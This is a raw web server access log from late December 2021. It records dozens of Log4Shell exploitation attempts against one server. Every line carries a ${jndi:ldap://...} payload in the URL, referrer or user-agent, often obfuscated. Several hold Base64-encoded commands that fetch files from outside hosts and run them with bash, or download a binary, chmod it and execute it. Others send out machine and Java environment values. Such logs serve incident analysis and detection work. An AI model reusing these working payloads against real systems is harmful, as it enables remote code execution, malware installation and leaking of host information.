195.54.160.149 - - [20/Dec/2021:11:06:35 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
164.52.53.163 - - [20/Dec/2021:12:25:19 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
164.52.53.163 - - [20/Dec/2021:12:25:19 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
143.244.156.104 - - [20/Dec/2021:16:45:31 +0000] "GET / HTTP/1.1" 302 203 "${j${k8s:k5:-ND}i${sd:k5:-:}ldap://135.148.132.224:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9ydW47IGN1cmwgLU8gaHR0cDovLzE1Mi42Ny42My4xNTAvcnVuOyBjaG1vZCA3NzcgcnVuOyAuL3J1biByY2UueDg2}" "${j${k8s:k5:-ND}i${sd:k5:-:}ldap://135.148.132.224:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9ydW47IGN1cmwgLU8gaHR0cDovLzE1Mi42Ny42My4xNTAvcnVuOyBjaG1vZCA3NzcgcnVuOyAuL3J1biByY2UueDg2}"
211.154.194.21 - - [20/Dec/2021:17:57:38 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
211.154.194.21 - - [20/Dec/2021:17:57:39 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
147.182.202.30 - - [20/Dec/2021:18:56:53 +0000] "GET / HTTP/1.1" 302 203 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//135.148.132.224:1389/Basic/Command/Base64//d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9ydW47IGN1cmwgLU8gaHR0cDovLzE1Mi42Ny42My4xNTAvcnVuOyBjaG1vZCA3NzcgcnVuOyAuL3J1biByY2UueDg2}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//135.148.132.224:1389/Basic/Command/Base64//d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9ydW47IGN1cmwgLU8gaHR0cDovLzE1Mi42Ny42My4xNTAvcnVuOyBjaG1vZCA3NzcgcnVuOyAuL3J1biByY2UueDg2}')"
170.210.45.163 - - [20/Dec/2021:19:12:37 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [20/Dec/2021:19:12:37 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
150.158.95.54 - - [20/Dec/2021:19:47:54 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
150.158.95.54 - - [20/Dec/2021:19:47:54 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
195.54.160.149 - - [20/Dec/2021:20:40:20 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [20/Dec/2021:20:40:21 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
185.184.152.140 - - [21/Dec/2021:02:35:10 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
185.184.152.140 - - [21/Dec/2021:02:35:10 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
121.4.56.143 - - [21/Dec/2021:07:08:57 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
121.4.56.143 - - [21/Dec/2021:07:08:58 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
150.158.95.54 - - [21/Dec/2021:14:41:50 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
150.158.95.54 - - [21/Dec/2021:14:41:51 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
195.54.160.149 - - [21/Dec/2021:16:35:41 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [21/Dec/2021:16:35:41 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [22/Dec/2021:03:53:55 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
5.157.38.50 - - [22/Dec/2021:11:31:21 +0000] "GET /${jndi:ldap://142.93.172.227:1389/Exploit} HTTP/1.1" 404 239 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
5.157.38.50 - - [22/Dec/2021:11:31:21 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://142.93.172.227:1389/Exploit}"
5.157.38.50 - - [22/Dec/2021:11:31:23 +0000] "GET /?s=${jndi:ldap://142.93.172.227:1389/Exploit} HTTP/1.1" 200 96 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
195.54.160.149 - - [22/Dec/2021:13:26:05 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [22/Dec/2021:13:26:06 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.146.165.168 - - [22/Dec/2021:14:09:42 +0000] "GET / HTTP/1.1" 302 203 "-" "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.165.168:1389/;;50.116.41.48--80;;${env:USERDOMAIN};;${env:COMPUTERNAME};;${java:os};;${sys:java.version};;}"
45.146.165.168 - - [22/Dec/2021:17:29:42 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://45.146.165.168:1389/;;50.116.41.48--80;;${env:USERDOMAIN};;${env:COMPUTERNAME};;${java:os};;${sys:java.version};;}"
195.54.160.149 - - [23/Dec/2021:09:50:33 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [23/Dec/2021:09:50:33 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
167.71.175.10 - - [23/Dec/2021:15:22:48 +0000] "GET /${jndi:ldap://142.93.172.227:1389/Exploit} HTTP/1.1" 404 239 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
167.71.175.10 - - [23/Dec/2021:15:22:48 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://142.93.172.227:1389/Exploit}"
167.71.175.10 - - [23/Dec/2021:15:22:48 +0000] "GET /?s=${jndi:ldap://142.93.172.227:1389/Exploit} HTTP/1.1" 200 96 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
195.54.160.149 - - [23/Dec/2021:20:33:13 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
18.221.182.245 - - [24/Dec/2021:14:46:27 +0000] "GET / HTTP/1.1" 302 203 "${jnd${123%25ff:-${123%25ff:-i:}}ldap://135.148.130.60:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTguMjIyLjEyMi4yMjEvcmVhZGVyOyBjdXJsIC1PIGh0dHA6Ly8xOC4yMjIuMTIyLjIyMS9yZWFkZXI7IGNobW9kIDc3NyByZWFkZXI7IC4vcmVhZGVyIHJ1bm5lcg==}" "${jnd${123%25ff:-${123%25ff:-i:}}ldap://135.148.130.60:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTguMjIyLjEyMi4yMjEvcmVhZGVyOyBjdXJsIC1PIGh0dHA6Ly8xOC4yMjIuMTIyLjIyMS9yZWFkZXI7IGNobW9kIDc3NyByZWFkZXI7IC4vcmVhZGVyIHJ1bm5lcg==}"
195.54.160.149 - - [24/Dec/2021:17:12:08 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
170.210.45.163 - - [24/Dec/2021:23:52:40 +0000] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 404 239 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [24/Dec/2021:23:52:40 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
178.176.202.121 - - [25/Dec/2021:00:09:48 +0000] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 302 250 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
178.176.202.121 - - [25/Dec/2021:00:09:48 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
195.54.160.149 - - [25/Dec/2021:02:44:05 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [25/Dec/2021:02:44:05 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
163.172.54.124 - - [25/Dec/2021:03:18:07 +0000] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 302 250 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
163.172.54.124 - - [25/Dec/2021:03:18:07 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
199.195.250.77 - - [25/Dec/2021:11:25:09 +0000] "GET /?kicut=${jndi:ldap://50.116.41.48.c70g89jk9oedekoo8sugc8yoejayyyyyn.secresponstaskfrce.com/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
195.54.160.149 - - [25/Dec/2021:13:32:04 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [25/Dec/2021:23:03:06 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [25/Dec/2021:23:03:06 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
178.176.202.121 - - [26/Dec/2021:07:52:04 +0000] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 404 239 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
178.176.202.121 - - [26/Dec/2021:07:52:05 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
